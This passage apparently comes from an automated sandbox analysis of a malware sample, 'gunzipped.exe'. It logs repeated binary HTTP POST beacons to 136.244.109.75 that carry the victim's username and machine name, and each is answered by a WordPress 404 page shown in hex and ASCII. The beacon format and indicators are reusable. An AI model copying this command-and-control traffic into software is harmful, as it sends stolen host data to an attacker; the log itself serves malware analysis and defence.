                          Apr 17, 2024 03:18:32.588951111 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          66192.168.2.549780136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:18:32.922641039 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:18:33.126036882 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:18:34.054111004 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:18:33 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:18:34.054174900 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:18:34.054213047 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:18:34.054250956 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:18:34.054292917 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:18:34.054331064 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:18:34.054369926 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:18:34.054414988 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:18:34.054454088 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:18:34.054500103 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          67192.168.2.549781136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:18:34.395591974 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:18:34.598916054 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:18:35.517859936 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:18:34 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:18:35.517924070 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:18:35.517962933 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:18:35.518002033 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:18:35.518043995 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:18:35.518081903 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:18:35.518120050 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:18:35.518157959 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:18:35.518194914 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:18:35.518238068 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          68192.168.2.549782136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:18:35.861537933 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:18:36.065365076 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:18:37.025995970 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:18:35 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
